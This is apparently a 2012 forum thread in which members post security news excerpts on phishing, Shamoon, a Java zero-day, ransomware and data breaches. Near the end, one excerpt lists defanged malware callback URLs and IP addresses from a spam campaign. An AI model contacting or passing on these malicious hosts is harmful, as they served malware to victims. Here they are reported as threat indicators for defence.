Adware Shifts Focus from Advertising to Data Harvesting (http://www.hotforsecurity.com/blog/adware-shifts-focus-from-advertising-to-data-harvesting-2942.html?goback=%2Egde_1003727_member_141915628)
-
Facebook has more than 83 million illegitimate accounts
http://www.bbc.com/news/technology-19093078
According to the Yahoo News version of the story, Facebook claims that the vast majority of the "illegitimate" accounts fall into two categories:
1) Members who forgot their password or other login ID and set up a new account to get back in. I won't go anywhere near FB, so don't know if they've got the usual "forgot my password" thing which would presumably avoid this.
2) Commercial (including non-profit) accounts which should have been set up as pages rather than accounts.
While they agree that in some cases an account might have been set up specifically for spamming/scams, they feel those are a very small percentage.
-
Google's anti-malware Bouncer too tolerant
http://www.h-online.com/security/news/item/Google-s-anti-malware-Bouncer-too-tolerant-1654441.html
-
Cloud service cracks VPN passwords in 24 hours
http://www.h-online.com/security/news/item/Cloud-service-cracks-VPN-passwords-in-24-hours-1656104.html
-
***
10 Olympics-Themed Phishing Scams To Avoid At All Costs
Every four years, the Olympics provide the opportunity for world-class athletes to raise their games just a little higher. But, the same is also true in the cyberworld. We've looked through a long list of warnings from the Olympic Committee and distilled a few of the ones we thought were not only intriguing but also specifically targeted at unsuspecting spectators.
Read more in the slide show at :
http://www.crn.com/slide-shows/security/240004790/10-olympics-themed-phishing-scams-to-avoid-at-all-costs.htm?pgno=1
***
-
***
DDoS Attacks Are Getting Bigger And Badder
Data from a DDoS security vendor suggests that distributed denial of service attacks are not only becoming more widespread, they are also becoming "larger" and more likely to target specific applications.
Read more at :
http://www.crn.com/news/security/240005051/ddos-attacks-are-getting-bigger-and-badder.htm?cid=nl_crn
***
-
Script Kiddies Posing as Hackers
http://www.wired.com/gadgetlab/2012/08/apple-amazon-mat-honan-hacking/all/ (http://www.wired.com/gadgetlab/2012/08/apple-amazon-mat-honan-hacking/all/)
What a story! Be sure to read 'Comments". Very illuminating. Scary.
As a journalist, has some power to rectify issues.
-
***
Web Apps Under Attack One-Third Of The Time
Web applications are heavily targeted by hackers, most of whom see them as a useful point of vulnerability from which to access sensitive data that may travel over those apps.
... the average Web application can expect attacks 120 days per year, though some are actually being attacked more than twice that amount, or nearly 80 percent of the time.
The average attack, according to the study, has duration of approximately 7 minutes and 42 seconds with the longest attacks reaching 79 minutes.
Read more at :
http://www.crn.com/news/security/240005185/web-apps-under-attack-one-third-of-the-time.htm?cid=nl_crn
***
-
***
Phishing Scheme Targets ADP, Other Outsourced Payroll Firms
Outsourced payroll management services are reportedly being used as bogus sources in a series of phishing schemes that have been launched over the past few weeks.
According to a report by Internet Storm Center, "Few things are as juicy for the bad guys as getting a keylogger onto the computer of someone who manages payroll. HR/payroll employees tend to have access to personal data of staff and usually have some form of access to a well-stocked bank account that is used to pay the wages."
The report goes on to say that ADP is one of the targeted payroll services. As part of the attack, customers apparently get an email indicating that their digital certificate that enables access to the system is about to expire. A link is then provided through which the certificate can presumably be renewed, but that link actually redirects them to what is believed to be a rented Linux server, through which all forms of malfeasance can occur.
Read more at :
http://www.crn.com/news/security/240005200/phishing-scheme-targets-adp-other-outsourced-payroll-firms.htm?cid=nl_crn
***
-
***
Apple iCloud Hack Raises Concerns Over Cloud Security
The hack into a Gizmodo writer’s Amazon and Apple accounts over the weekend is being used as a cautionary tale for consumers, a call to action for cloud providers regarding security policies and a sounding board for concerns about the rush to the cloud.
In a lengthy first-person account in Wired magazine, writer Mat Honan outlines how an attacker quickly found his way into Honan’s iCloud account and wiped everything from his Mac, iPhone and iPad, all of which were linked to Apple’s cloud service. The attacker also hacked into his Twitter and Gmail accounts. In the story, Honan admonishes himself for failing to follow basic security protocol—his online accounts were linked together, and he had failed to back up his data, for example.
However, the larger concern was how quickly and easily the attacker—who called himself “Phobia”—was able to get gain control of Honan’s Apple iCloud account through just a couple of phones calls to Amazon and Apple, convincing customer service representatives at both places that he was Honan. The attack was less about hacking into the accounts via a computer and more about social engineering gleans the necessary personal information from Amazon and Apple.
It gets worse. Read more at :
http://www.eweek.com/c/a/Security/Apple-iCloud-Hack-Raises-Concerns-Over-Cloud-Security-609440/?kc=EWKNLEDP08092012D
***
-
***
Businesses at Risk When Moving Sensitive Data to Cloud Storage
However, businesses have a ways to go when it comes to understanding how to protect that critical data and whose responsibility it is, the study, entitled "Encryption in the Cloud," found.
About half the respondents said their organizations currently transfer sensitive or confidential data to the cloud. Of those, 64 percent believe the cloud provider has primary responsibility for protecting that data, but nearly two-thirds of respondents say they do not know what cloud providers are actually doing to protect the sensitive or confidential data entrusted to them.
Thirty-six percent of respondents say their organization has primary responsibility for managing the keys, while 22 percent said the cloud provider has primary responsibility for encryption key management. The study showed that even in cases where encryption is performed inside the enterprise, more than half of the respondents hand over control of the keys to the cloud provider.
The study showed an almost even split between respondents who say their organization applies persistent encryption to data before it is transferred to the cloud provider and those who say they rely on encryption that is applied within the cloud environment. Another one-third of respondents said their organizations are very likely to transfer sensitive or confidential data to the cloud within the next two years, suggesting the risks of a breach will increase as more companies jump on the cloud storage bandwagon.
Read more at :
http://www.eweek.com/c/a/Data-Storage/Businesses-at-Risk-When-Moving-Sensitive-Data-to-Cloud-Storage-708368/?kc=EWKNLEDP08092012E
***
-
***
Online accounts for Blizzard video games hacked
From Associated Press
August 10, 2012 11:16 AM EDT
IRVINE, Calif. (AP) — The maker of video games such as "Diablo" and "World of Warcraft" is warning players that hackers have gained unauthorized access to some online accounts.
Blizzard Entertainment says it has no evidence that the intruders acquired credit card information, billing addresses or players' names.
But hackers were able to access other data, including email addresses and answers to players' personal security questions. Blizzard says it doesn't believe such information alone is enough for anyone to gain access to its Battle.Net online accounts, which let people play with others around the world online.
The company also says hackers took encrypted versions of passwords. As a precaution, it's recommending that players change their passwords.
Blizzard, which is a division of Activision Blizzard Inc., didn't say how many accounts were affected.
***
-
***
Google fined $22.5M for latest privacy breakdown
MICHAEL LIEDTKE
From Associated Press
August 09, 2012 5:31 PM EDT
SAN FRANCISCO (AP) - Google is paying a $22.5 million fine to settle the latest regulatory case questioning the Internet search leader's respect for people's privacy and the integrity of its internal controls.
The penalty announced Thursday by the Federal Trade Commission matches the figure reported by The Associated Press and other media outlets last month. It's the most that the FTC has ever fined a company for a civil violation.
The rebuke resolves the FTC's allegations that Google Inc. duped millions of Web surfers who use Apple Inc.'s Safari browser.
Google had assured people that it wouldn't monitor their online activities, as long as they didn't change the browser settings to permit the tracking.
Google broke that promise, according to the FTC, by creating a technological loophole that enabled the company's DoubleClick advertising network to shadow unwitting Safari users. That tracking gave DoubleClick a better handle on what kinds of marketing pitches to show them.
The FTC concluded that the contradiction between Google's stealth tracking and its privacy assurances to Safari users violated a vow that the company made in another settlement with the agency in October.
Read more at :
http://my.earthlink.net/article/tec?guid=20120809/d30b4b70-de77-4b3f-8d6f-b4a445fc708c
***
-
***
FTC finalizes privacy settlement with Facebook
ANICK JESDANUN
From Associated Press
August 10, 2012 4:22 PM EDT
NEW YORK (AP) — The Federal Trade Commission voted Friday to finalize its settlement with Facebook, resolving charges that the social network exposed details about users' lives without getting the required legal consent.
Facebook Inc. agreed to submit to government audits of its privacy practices every other year for the next two decades. The company also committed to getting explicit approval from users before changing the types of content it makes public.
Both Facebook and Google have vast amounts of data on their users — Facebook through the things people share on the site, and Google through the searches and other things people do. Such information is valuable because it can be used to improve the lucrative targeted advertising pitches that both companies aim at users.
Over the years, Facebook has been pushing users to voluntary share more about themselves. That ultimately encourages users and their friends to spend more time on the site, which in turn allows Facebook to sell more ads. Although Facebook boasts that it gives users a variety of software settings so they can decide which photos, links and updates to share with whom, the company changes those options on a regular basis.
Much of the FTC's complaint against Facebook centers on a series of changes that the company made to its privacy controls in late 2009. The revisions automatically shared information and pictures about Facebook users, even if they previously programmed their privacy settings to shield the content. Among other things, people's profile pictures, lists of online friends and political views were suddenly available for the world to see, the FTC alleged.
The complaint also charges that Facebook shared its users' personal information with third-party advertisers from September 2008 through May 2010 despite several public assurances from company officials that it wasn't passing the data along for marketing purposes.
Read more at :
http://my.earthlink.net/article/tec?guid=20120810/e3c65177-ca7a-4478-99a3-befe2f9564f9
***
-
Google forced to temporarily deactivate copy protection for Android apps
http://www.h-online.com/security/news/item/Google-forced-to-temporarily-deactivate-copy-protection-for-Android-apps-1661755.html
-
Oracle releases unscheduled fix for critical vulnerability
http://www.h-online.com/security/news/item/Oracle-releases-unscheduled-fix-for-critical-vulnerability-1666898.html
-
***
FTC accuses Facebook of misleading developers over security
An investigation by the U.S. Federal Trade Commission (FTC) has suggested that the social networking site fell short in reviewing and verifying applications, and therefore "deceived" developers over security ratings.
When developers passed along an application into the now-closed verified apps scheme, it is reported that the social networking site was paid up to $95,000 in order to give software green 'ticks' of approval. By doing so, individual applications were given a "test for trustworthy user experiences" by Facebook.
However, an in-depth investigation into Facebook's practices, conducted by Commissioners Jon Leibowitz, J. Thomas Rosch, Edith Ramirez and Julie Brill, has found that the social networking giant did not take the steps to review applications that it promoted.
According to the FTC's report, under the title "Facebook's deceptive verified apps program", the program which ran from approximately May 2009 to December 2009 awarded 254 applications a green 'verified' badge.
Red more at :
http://www.zdnet.com/ftc-accuses-facebook-of-misleading-developers-over-security-7000002528/
***
-
***
Do Not Track: has Microsoft outwitted competitors Google and Facebook?
With a deft side step, Microsoft appears to have outflanked Do Not Track opponents, like Google and Facebook who depend on tracking for their advertising.
In a recent Microsoft blog post, Chief Privacy Officer Brendon Lynch explained how IE10 would handle Do Not Track preferences:
DNT will be enabled in the "Express Settings" portion of the Windows 8 set-up experience. There, customers will also be given a “Customize” option, allowing them to easily switch DNT "off" if they'd like.
In this apparently innocuous 'clarification', he also writes that this will benefit all users: they will enjoy the best privacy settings by default while having alternative options within easy reach.
Read more at :
http://nakedsecurity.sophos.com/2012/08/14/do-not-track-has-microsoft-outwitted-competitors-google-and-facebook/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=twitter&utm_source=twitterfeed
***
-
***
Google to drop search rankings of sites with many takedown notices
EFF says Google needs to be clearer on new criteria, which take effect Monday
In a Friday morning blog post, Google said it will change its search algorithm next week to take into account “the number of valid copyright removal notices” it receives for any site. High rates of removal notices are likely to drop a site down in the search results, which Google says “should help users find legitimate, quality sources of content more easily.”
The new move appears to be a nod in the direction of rightsholders, most notably the MPAA and RIAA. The latter trade group, meanwhile, has argued previously that Google isn’t doing enough to remove possibly infringing links.
On its website, the RIAA called the new move a "potentially significant announcement."
Read more at :
http://arstechnica.com/tech-policy/2012/08/google-to-drop-search-rankings-of-sites-with-many-takedown-notices/
***
-
***
Anonymous reaches out on IRC for Mars Curiosity hacking aid
It seems impossible, but apparently it's not. The hacker group Anonymous is attempting to spread its hacking activity all the way off of Earth and to the Red Planet, Mars.
A message on Internet Relay Chat (IRC) would seem to be a solicitation for aid in hacking the NASA's Mars Science Laboratory (MSL) mission, which saw its rover component, named Curiosity, land earlier this week.
Flashpoint Partners, a New York-based cybersecurity firm, spotted the following message by user "MarsCuriosity" on the AnonOps IRC channel on Thursday:
"MarsCuriosity: Anyone in Madrid, Spain or Canbarra who can help isolate the huge control signal used for the Mars Odyssey / Curiosity system please? The cypher and hopping is a standard mode, just need base frequency and recordings/feed of the huge signal going out. (yes we can spoof it both directions!)"
Read more at :
http://www.examiner.com/article/anoynmous-reaches-out-on-irc-for-mars-curiosity-hacking-aid
***
-
***
Improving the Security of your WordPress Blog
WordPress powered websites are often target for hackers. Here are the some of the best security plugins and tips to better protect your WordPress blog.
About a month ago, this WordPress blog was hacked. And since my other websites like ctrlq.org and hundredzeros.com are hosted on the same web server, the hacker successfully managed to wipe off all these sites from the Internet as well.
The web hosting company says that it could have happened because one of the sites was running an older version of WordPress. The passwords weren’t compromised though as all the login activity happened from known IP addresses. It was a tough period but fortunately, the deleted sites have been restored and the traffic is also back to normal.
Here’s a list of changes I have done to improve the security of my WordPress blogs though the perpetual worry that such a thing can happen again will remain.
For those of you using WordPress, read more at :
http://www.labnol.org/internet/improve-wordpress-security/24639/
***
-
Google warns of using Adobe Reader - particularly on Linux
http://www.h-online.com/security/news/item/Google-warns-of-using-Adobe-Reader-particularly-on-Linux-1668153.html
-
***
Shamoon the Wiper - Copycats at Work
Earlier today, we received an interesting collection of samples from colleagues at another anti-malware company. The samples are especially interesting because they contain a module with the following string:
C:\Shamoon\ArabianGulf\wiper\release\wiper.pdb
Of course, the “wiper” reference immediately reminds us of the Iranian computer-wiping incidents from April 2012 that led to the discovery of Flame.
The malware is a 900KB PE file that contains a number of encrypted resources. The malware appears to be collecting information about “interesting” files on the infected system.
It is more likely that this is a copycat, the work of a script kiddies inspired by the story.
We detect the 32 bit components of the malware as Trojan.Win32.EraseMBR.a. The 64 bit component is detected as Trojan.Win64.EraseMBR.a. At moment of discovery a main dropper was detected by heuristics as "HEUR:Trojan.Win32.Generic"
See & read more at :
https://www.securelist.com/en/blog/208193786/Shamoon_the_Wiper_Copycats_at_Work
***
-
***
MyAgent Trojan Targets Key Technology-Related Industries
Security experts are analyzing a targeted trojan that leverages emailed PDF files to gain access to systems and deliver its payload to specified networks in the aerospace, chemical, defense and tech industries.
According to researchers at the FireEye Malware Intelligence Lab, the MyAgent trojan masks its payload as a zipped health insurance policy, but then downloads a second file entitled, "ABODE32.exe," which may have had its name derived from PDF originator Adobe (NSDQ:ADBE)’s, into the temp directory. The executable then accesses Windows Protected Storage where passwords for Internet Explorer, Outlook and additional applications are kept, and it begins uploading data to command-and-control servers. Symptoms of infection include the loading of various DLLs, which are believed to be used to support communication with C&C servers.
The malware also uses JavaScript to assess which version of Adobe Reader is currently running on the host machine, and then executes attacks based on known vulnerabilities in the discovered version.
Read more at :
http://www.crn.com/news/security/240005702/myagent-trojan-targets-key-technology-related-industries.htm?cid=crnbuzz
***
-
***
Invisible iFrame drive-by malware attacks explained
iFrames and script tags are being used by malicious hackers to serve up drive-by internet attacks, silently and invisibly.
iFrames allow webmasters to embed the content of one webpage into another, seamlessly.
There are legitimate reasons why some websites may want to do that - but what cybercriminals do is exploit the functionality (presumably they have been able to gain write access to the website) to deliver malware such as fake anti-virus or a PDF vulnerability exploit to infect your computer.
What's sneaky is that malicious hackers can make the embedded content invisible to the naked eye, by making the window zero by zero pixels in size. You can't see the threat, but your web browser is still dragging it down.
See & read more at :
http://nakedsecurity.sophos.com/2012/08/16/invisible-iframe-drive-by-malware-attacks-explained-video/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=twitter&utm_source=twitterfeed
***
-
***
NSS Labs expose inadequate AV products
NSS Labs testing showed that 9 of 13 popular consumer anti-virus products tested failed to provide adequate protection against exploits targeting two recent critical Microsoft vulnerabilities.
Only 4 vendors – Avast, Kaspersky, McAfee and Trend Micro – successfully blocked all attacks delivered over both HTTP and HTTPS.
“This test revealed that numerous vendors that protected against an exploit over HTTP failed to protect against the same exploit delivered via HTTPS,” said Bob Walder, Chief Research Officer at NSS Labs. "Vendors who did not perform well might want to reconsider their default settings in this age of attacks against SSL and other protocols.”
Read more at :
http://www.net-security.org/malware_news.php?id=2224
***
-
***
MyAgent Trojan Targets Key Technology-Related Industries
Security experts are analyzing a targeted trojan that leverages emailed PDF files to gain access to systems and deliver its payload to specified networks in the aerospace, chemical, defense and tech industries.
The malware also uses JavaScript to assess which version of Adobe Reader is currently running on the host machine, and then executes attacks based on known vulnerabilities in the discovered version.
Another good reason to not use Adobe Reader but use some other PDF reader.
Read more at :
http://www.crn.com/news/security/240005702/myagent-trojan-targets-key-technology-related-industries.htm?cid=nl_crn
***
-
***
FBI warns of Internet malware that locks computers, demands money
Aug 17, 2012 (Bangor Daily News - McClatchy-Tribune Information Services via COMTEX) -- The Federal Bureau of Investigation's Boston Division issued a warning Thursday about a new Internet virus that locks computers and carries a fake message purportedly from the FBI requesting payment to unlock the computer.
In the alert, the FBI's Boston Division -- which covers Rhode Island, Maine, New Hampshire and Massachusetts -- said it has received an increasing number of reports from individuals who have fallen victim to the scam.
Though she declined to provide numbers, FBI spokeswoman Katherine Gulotta said that about 15 percent of all of the computer complaint calls the FBI has received in the Boston Division have been attributed to the Reveton virus. Of those, 10 percent came from Maine, she said.Reveton has been identified as "drive-by" malicious software, or malware, because unlike many viruses, which activate when users open a file or attachment, this one can install itself when users simply click on a compromised website.
Once infected, the victim's computer immediately locks and the monitor displays a screen stating that there has been a violation of federal law. The fraudulent message goes on to say the user's Internet address has been identified by the FBI or the Department of Justice's Computer Crime and Intellectual Property Section as having visited child pornography sites and other illegal content, Gulotta said Thursday.
To unlock their machines, users are told to pay a fine to the U.S. Department of Justice using a prepaid money card service. Gulotta said that the amounts demanded vary but are in the $200 range. In addition to the "ransomware," the FBI said, the malware continues to operate on the compromised computer and can be used to commit online banking and credit card fraud.
Read more at :
http://it.tmcnet.com/news/2012/08/17/6515717.htm
***
-
***
FBI warns of child porn scam
The FBI is warning computer users about a new scam that not only takes your money, but accuses you of visiting child pornography websites as well.
"They're getting more boisterous," said Troy Rice, an IT expert. "They're trying to really intimidate the average user."
The trouble begins when you click an unfamiliar link. Hackers download a virus to your computer, and you see a screen telling you that you're in trouble with the FBI for looking at child pornography. Then it demands you pay a $100 fine to the Department of Justice.
"And the scariest thing is it's probably not just the 100 bucks. You've now given them a credit card, and you've given them proprietary information, personal information, so once they have that it's even more detrimental," said Rice.
If your computer is compromised, try to run a virus scan. If you can't get rid of the problem, have your computer professionally cleaned.
The best way to prevent the attack is to be careful what you click on. If you're casually surfing the web, clicking from one link to another, experts say it's only a matter of time before you run into trouble.
If you're a victim of online fraud, report it to the FBI at www.IC3.gov.
See & read more at :
http://www.tucsonnewsnow.com/story/19300728/fbi-warns-of-child-porn-scam
***
-
Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities?
tested against CVE-2012-1875 and CVE-2012-1889. only 4 of 13 tested got 100% ...... read and see who
pdf.doc
http://www.nsslabs.com/assets/noreg-reports/2012/Can%20Consumer%20AV%20Products%20Protect.pdf
-
Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities?
tested against CVE-2012-1875 and CVE-2012-1889. only 4 of 13 tested got 100% ...... read and see who
pdf.doc
http://www.nsslabs.com/assets/noreg-reports/2012/Can%20Consumer%20AV%20Products%20Protect.pdf
Related post in blog: https://blog.avast.com/2012/08/17/avast-one-of-few-to-protect-against-microsoft-vulnerabilities/
-
Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities?
tested against CVE-2012-1875 and CVE-2012-1889. only 4 of 13 tested got 100% ...... read and see who
pdf.doc
http://www.nsslabs.com/assets/noreg-reports/2012/Can%20Consumer%20AV%20Products%20Protect.pdf
Note the following quote from the pdf; page 6: En garde Once an endpoint defense mechanism has been bypassed, the next step taken by most attackers is to attempt disable it completely. This would, for example, enable further malicious software to be downloaded without risk of it being detected by the protection mechanism.
There are significant differences in the ability of market-leading products to defend themselves against being disabled. Unfortunately both Microsoft and CA offerings presented virtually no defensive capabilities. Both products could be disabled with a simple "kill" command.
Quote taken directly from Page 6 of pdf. link provided by Pondus.
Whoa! One would think Microsoft would at least have measures in place to prevent their product from being disabled so easily.
I had Norton Antivirus back a few years ago (more than ten years ago) fail to protect in a similar situation. Was very tough to recover from, as uninstalling and reinstalling would not work. I did eventually get it to run again, but.... self-defense should be a basic protection for all antiviruses, so users should be aware of this flaw and lack of necessary protection.
-
another type of scam......
SEC Shuts Down $600 Million Online Pyramid and Ponzi Scheme
http://www.sec.gov/news/press/2012/2012-160.htm
-
***
Own the Email, Own the Person
A must read for all email users, especially those with accounts linked with Facebook, & others.
For attackers looking to take control of a victim's online presence, there is no better place to start than the target's email account. If you own the email, you own the person. That's never been more true than today, with so many social networks, services and shopping sites attached to users' email addresses. New research done by Cesar Cerrudo of IOActive shows just how simple it can be to get control of a target's email account, and from there, everything else.
For many people, their personal email account is where they store their lives. Bank statements, bills, personal correspondence, work files, anything you can get in electronic form can often be found in a given target's email inbox. And a large number of email systems protect users' inboxes with nothing more complicated than a simple password. Gmail is one notable exception, with its two-factor authentication option that enables users to employ a mobile app to generate one-time codes that they use in addition to their passwords. But, that's an option and not mandatory, and for many users just looks like an annoyance on the way to getting their email.
Please read more at :
http://threatpost.com/en_us/blogs/own-email-own-person-082012
***
-
***
SMSZombie Malware Infecting Android Devices, Stealing Money
A nasty new piece of malware that has the ability to steal money from users' via fraudulent SMS payments has shown up in a Chinese Android market and researchers say it's infected more than 500,000 victims. The SMSZombie malware is being hidden inside apps on the app market and once it's on a device it has the ability to prevent users from uninstalling it.
"The SMSZombie virus has been hidden in a variety of wallpaper apps and attracts users with provocative titles and pictures. When the user sets the app as the device’s wallpaper, the app will request the user to install additional files associated with the virus. If the user agrees, the virus payload is delivered within a file called 'Android System Service',"
Read more at :
http://threatpost.com/en_us/blogs/smszombie-malware-infecting-android-devices-stealing-money-082012
***
-
***
Royal Mail malware attack distributed via email
It's wise to be wary when it comes to unsolicited email, even when the email appears to come from a legitimate organisation.
Today we're warning internet users to be careful not to be tricked into open attachments that have been spammed out, posing as communication from the British Royal Mail.
It should go without saying that the emails are not connected with the real Royal Mail in anyway, despite them appearing to arrive from noreply@royalmail.com and containing the Royal Mail's logo.
The cybercriminals who have distributed the attack are hoping that your curiousity will be piqued, and you will be tempted to open the attached ZIP file in the mistaken belief that a parcel is winging its way to you.
See & read more at :
http://nakedsecurity.sophos.com/2012/08/20/royal-mail-malware/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=feed&utm_source=feedburner
***
-
You really would have to be gullible to fall for this and many other scams. How in hells bells would they know your email. Not to mention, in this case the Royal Mail is going to hell in a hand basket. Its level of service is getting worse not better so I couldn't see them even offering this service.
Whilst they have a tracking service they certainly don't have an email notification service, the sender would have to know your email, no doubt this would be a premium service which no doubt you the user would be paying for (so you should know and expect it). How would it even work if they had when they really haven't a clue when your parcel might arrive.
It doesn't take much rational thought to see through these scams.
-
Hi DavidR,
I also always think: "Oh my great grandfathers, how can people fall for these messages, and take this message seriously".
But there are always those who will take the bait. A lot of humans react irrationally and then the rational thinking sets in a fraction too late.
If that wasn't the case this would have stopped a long, long time ago. It is always better to think first and then decide not to click,
than to click first and come to realize later what you have done,
polonus
-
***
These email scams happen thousands of times each day, and, there are thousands of new gullible sheep getting on-line each day.
90% of these new gullible sheep do not even think anyway.
***
-
***
Citibank victimized by hackers, insists cardholders are safe
Reuters is reporting that Citibank's systems were hacked, resulting in a loss of Personally Identifiable Information (PII).
Citibank says that data for 1% of their cardholders was accessed through this breach, but customers' Social Security Numbers (SSNs), birth dates, card expiration dates and CVV codes are safe.
Information that may have been disclosed to the hackers includes customers' names, account numbers, contact details and email addresses.
According to Citibank's website they are the world's largest provider of credit cards, issuing more than 150,000,000 cards globally. Based on these numbers, information for 1,500,000 or more individuals may have been compromised.
Read more at :
http://nakedsecurity.sophos.com/2011/06/09/citibank-victimized-by-hackers-insists-cardholders-are-safe/
***
-
These email scams happen thousands of times each day, and, there are thousands of new gullible sheep getting on-line each day.
90% of these new gullible sheep do not even think anyway.
These scams are frequent and the only thing that changes is the so called hook, social engineering to hook the inquisitive fools.
-
Hi DavidR,
There is a good English proverb for this attitude "Curiosity killed the proverbial animal."
It rarely land on all fours...as it walks on two...
polonus
-
Or another "there is one born every minute" and they aren't just talking about babies, but fools.
-
Interesting I have just received one of the Royal Mail ones, it is worse, the email isn't even personally sent to me what an absolute joke.
Anyone falling for this really needs their head examined.
I have a rudimentary spam filter if it isn't for me it gets flagged as 'Not to me' couldn't be simpler. Email source and headers are also a dead giveaway. Even the attachment is a zip file so the fool would have to open that, extract the contents and then run the file extracted.
Life is even easier if I just believe my MailWasher anti-spam with a spam score of -405 with the various filters detecting it as spam.
-
Shamoon virus was announced on 16 August 2012.
The virus has been noted as unique for having differing behaviour from other malware cyber espionage attacks. Shamoon is capable of spreading to other computers on the network, including those disconnected from the internet. Once a system is infected, the virus continues to compile a list of files from specific locations on the system, erase and then send information about these files back to the attacker. Finally, the virus will overwrite the master boot record of the system to prevent it from booting
http://en.wikipedia.org/wiki/Shamoon
-
Multi-platform trojan also gets on to virtual machines: http://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines
polonus
-
***
'Anonymous' Targets British Websites In Support Of Assange
The British Ministry of Justice has confirmed that it's investigating issues with its website that are reportedly part of an attack by the "Anonymous" group of hackers in support of WikiLeaks founder Julian Assange, who is under governmental protection in the Ecuadorian London embassy to avoid extradition to Sweden over alleged sexual misconduct.
The website of the British Department of Work and Pensions is believed to be similarly affected.
Anonymous has issued a statement indicating that it has launched a number of distributed denial-of-service (DDoS) attacks against the government of the United Kingdom. And, while the Ministry of Justice has acknowledged some level of disruption, it claims that the only issues thus far have been intermittent service interruptions. Other reports suggest that the attacks have been more successful than the British government has admitted.
Read more at :
http://www.crn.com/news/security/240005952/anonymous-targets-british-websites-in-support-of-assange.htm?cid=nl_crn
***
-
Are your personal data secure at Tesco's?
See: http://www.troyhunt.com/2012/07/lessons-in-website-security-anti.html#more article by Yroy Hunt on Troy Hunt's Blog - see: http://www.computing.co.uk/ctg/news/2199618/ico-to-check-out-tescocom-security#ixzz245h3mfnc article author = Graeme Burton
polonus
-
Website owners should watch out for Fake JQuery Website Serving Redirection Malware: http://blog.sucuri.net/2012/07/fake-jquery-website-serving-redirection-malware.html (Sucuri blog article author = dre armeda) Check your website for it here: http://sitecheck.sucuri.net/
polonus
-
McAfee splats bug that knocked punters offline
The internet? Oh no, far too dangerous for you to go alone ;D
http://www.theregister.co.uk/2012/08/23/mcafee_net_cutoff_bug/
-
Zero-Day Season is Not Over Yet
http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
http://forum.avast.com/index.php?msg=832984
-
Hi Asyn,
That is why users are advised not to use Java until the patch for the zero-day becomes available. Has been added to Metasploit: https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day (posted by sinn3)
and is actively being used in a new variant of Poison Ivy (reported by AleinVault's Jaime Blasco)
polonus
-
***
More on the above Java problem :
Disable Java In Your Browser To Avoid A Nasty New Malware-Spreading Attack
“It’s just a matter of time that a [proof-of-concept] will be released and other bad guys will get hold of this exploit as well,” write FireEye’s researchers. “It will be interesting to see when Oracle plans for a patch, until then most of the Java users are at the mercy of this exploit.”
In the meantime, users can simply turn Java off in their browsers, a move that means sacrificing functionality on some websites but prevents possible “drive-by download” attacks that invisibly infect PCs via the Web.
Read more at :
http://www.forbes.com/sites/andygreenberg/2012/08/27/disable-java-in-your-browser-to-avoid-a-nasty-new-malware-spreading-attack/
***
-
***
World's largest oil producer falls victim to 30K workstation attack
The Saudi Arabia-based, industry leader released a statement confirming that roughly 30,000 workstations were affected via cyber attack in mid-August. Details beyond that were scarce—Saudi Aramco said the virus "originated from external sources" and that its investigation into the matter was ongoing. There was no mention of whether this was related to this month's Shamoon attacks.
Read more at :
http://arstechnica.com/security/2012/08/worlds-largest-oil-producer-falls-victim-to-30k-workstation-attack/
This kind of attack could happen at oil producers in other countries.
***
-
***
Why your airline miles are easy theft targets
In the latest scam on consumers, cyber crooks are using emails and other tactics to phish for your airline miles, using them on hotels, cars and merchandise.
“When people have hundreds of thousands of miles, that’s like having money in the bank,” said George Hobica, founder of AirFareWatchdog.com, a travel site. “Consumers need to treat these accounts like they would their bank accounts or any other important account,” he said.
Many times consumers don’t even know they’ve been bilked out of their miles until they try to redeem them. This spring a Chicago couple discovered that the 175,000 miles they thought they had in their United Airlines account had been stripped down to 12,000. The airlines told them that the miles had been used for a trip to Singapore — which the couple had not taken.
Read more at :
http://articles.marketwatch.com/2012-08-22/finance/33304011_1_scam-international-airlines-fraudulent-emails
***
-
Five 0days: HP in the security dock
http://www.h-online.com/security/news/item/Five-0days-HP-in-the-security-dock-1676337.html
-
***
Lessons In Campus Cybersecurity
What universities are doing -- and should be doing -- in response to increased cyberthreats, and how students can protect their suddenly very valuable IDs
The University of Nebraska had just deployed a new security information event management (SIEM) system when an undergraduate student there apparently broke into the school's student information system, exposing sensitive information of 654,000 students, alumni, and employees.
While the breach was a serious one that is still under investigation, Nebraska was actually better off in the end than most universities that get hacked. An IT staffer detected an error message in one of the university's systems at 10 p.m. on a Wednesday evening in May, and began to escalate the issue, bringing in the security team, which investigated the activity and monitored some suspicious behavior throughout the night.
"By that next afternoon, we had figured out what had happened," says Joshua Mauk, information security officer for the University of Nebraska. An insider had accessed the university's PeopleSoft-based database.
Read more at :
http://www.darkreading.com/database-security/167901020/security/attacks-breaches/240006411/lessons-in-campus-cybersecurity.html
***
-
***
'Lulzsec hacker' latest to be arrested in US
Raynaldo Rivera, 20, is accused of being involved in hacks on Sony Pictures in May and June last year, in which thousands of personal details were published online.
If convicted, he could face up to 15 years in prison.
The FBI alleged he had worked with Cody Kretsinger, a 24-year-old who pleaded guilty to hacking charges in April.
Lulzsec, an off-shoot of the Anonymous hacking collective, gained notoriety last year with a string of high-profile attacks on websites and businesses.
Read more at :
http://www.bbc.co.uk/news/technology-19409205
***
-
***
While the below is not so new to the regulars here, it is my hope that many newbies here will read and become informed.
http://www.bbc.co.uk/news/technology-19409205
Security researchers from Websense have intercepted a currently circulating spam campaign, impersonating popular antivirus vendors in an attempt to trick end and corporate users into downloading and executing the malicious attachment.
...... and is currently impersonating Symantec, F-Secure, Verisign and Sophos.
Upon successful execution, the sample phones back to hxxp://bluemountain-ecards.net/images/loader.php (69.73.138.167), hxxp://asselegis.org.br/images/txt.txt (187.73.33.54), hxxp://basketcoach.com/images/logos/Plugin.dll (94.23.235.157).
Users are advised to avoid interacting with the emails, and to consider reporting them as spam as soon as they come across them.
See & read more at :
http://www.zdnet.com/cybercriminals-impersonate-popular-security-vendors-serve-malware-7000003433/
***
-
***
Hackers vow 'hellfire' in latest major data leak
